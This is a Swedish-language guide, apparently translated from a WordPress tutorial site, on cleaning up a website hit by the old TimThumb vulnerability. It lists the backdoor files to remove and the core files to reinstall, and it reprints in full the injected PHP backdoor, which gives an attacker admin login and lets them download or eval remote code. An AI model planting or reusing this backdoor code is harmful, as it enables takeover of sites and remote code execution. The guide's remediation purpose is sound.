Hur fixar och rensar du TimThumb Hack i WordPress

Hur fixar och rensar du TimThumb Hack i WordPress

SÄ om du kommer ihÄg rÀtt fanns det ett sÀkerhetsproblem med TimThumb-skriptet i augusti som fixades. Men fortfarande till vÄr förvÄning anvÀnder mÄnga webbplatser fortfarande den gamla versionen. Vi har fixat tre webbplatser hittills under den senaste mÄnaden, varav en var igÄr. SÄ det Àr vettigt att helt enkelt skriva en steg för steg-artikel sÄ att vÄra anvÀndare bara kan följa den. Alla de tre anvÀndare som vi ÄtgÀrdar det hÀr problemet visste inte ens vad TimThumb var eller om de anvÀnde det eller inte.

TimThumb Ă€r ett PHP-skript som Ă€ndrar storlek pĂ„ bilder. Det fanns en sĂ„rbarhet i den, men det Ă€r SÄKER att anvĂ€nda nu.

SÄ hur vet du att din webbplats Àr hackad? Om du ser en stor röd skÀrm i din webblÀsare nÀr du besöker din webbplats:

Om du börjar bombarderas med e-postmeddelanden om att anvÀndare omdirigeras frÄn din webbplats. Troligtvis Àr fallet att din webbplats var offer för detta utnyttjande.

Som en försiktighetsÄtgÀrd bör alla bara anvÀnda denna Timthumb-sÄrbarhetsskanner. Detta kommer att berÀtta om du anvÀnder den Àldre versionen av TimThumb. MÄnga temaklubbar uppgraderade sin kÀrna direkt. SÄ detta plugin kommer att kontrollera om den nya sÀkra versionen av Timthumb Àr installerad eller om en Àldre version Àr installerad.

Om din webbplats redan har blivit offer för detta utnyttjande av Timthumb Àr det hÀr du behöver göra.

Först mÄste du ta bort följande filer:

/wp-admin/upd.php
/wp-content/upd.php

Logga in pÄ WordPress-adminpanelen och installera om din WordPress-version. Vi vill specifikt installera om dessa filer:


/wp-settings.php
/wp-includes/js/jquery/jquery.js
/wp-includes/js/110n.js

Öppna sedan din plats dĂ€r du sannolikt hittar den hĂ€r stora skadliga kod som skördar inloggningsuppgifter och kakor. Den hĂ€r koden kommer till botten.


if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE="JavaScript">location.href="https://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/$fnm";</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

I ditt temas mapp letar du efter var som helst TimThumb-skriptet kan lagra cachade filer. Vanligtvis Àr de i denna struktur:


/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php

Ta bort allt som ser ut sÄ hÀr. Om du inte Àr sÀker pÄ saker, ta bort allt som inte Àr en bildfil.

NÀsta sak du vill göra Àr att ersÀtta timthumb.php med den senaste versionen som finns pÄ http://timthumb.googlecode.com/svn/trunk/timthumb.php

Nu skulle det vara en bra idĂ© att Ă€ndra dina lösenord frĂ„n och med din MySQL-inloggningsinformation till din WordPress-inloggningsinformation. Glöm inte att Ă€ndra lösenordet för MySQL i wp-config.php, annars kommer skĂ€rmen “Fel vid upprĂ€ttande av anslutning” att visas.

Ändra de hemliga nycklarna i din wp-config.php-fil. Du kan skapa en ny nyckel genom att gĂ„ till onlinegeneratorn.

Nu Àr du klar. Glöm inte att tömma alla sidans cachepluggar. Som en försiktighetsÄtgÀrd Àr det bra att rensa webblÀsarens cache och kakor ocksÄ.

För utvecklare, försök anvÀnda funktionen Extra bildstorlekar i WordPress för att ersÀtta Timthumb-funktionerna.

LÄt oss veta om du behöver ytterligare hjÀlp med vÄrt kontaktformulÀr.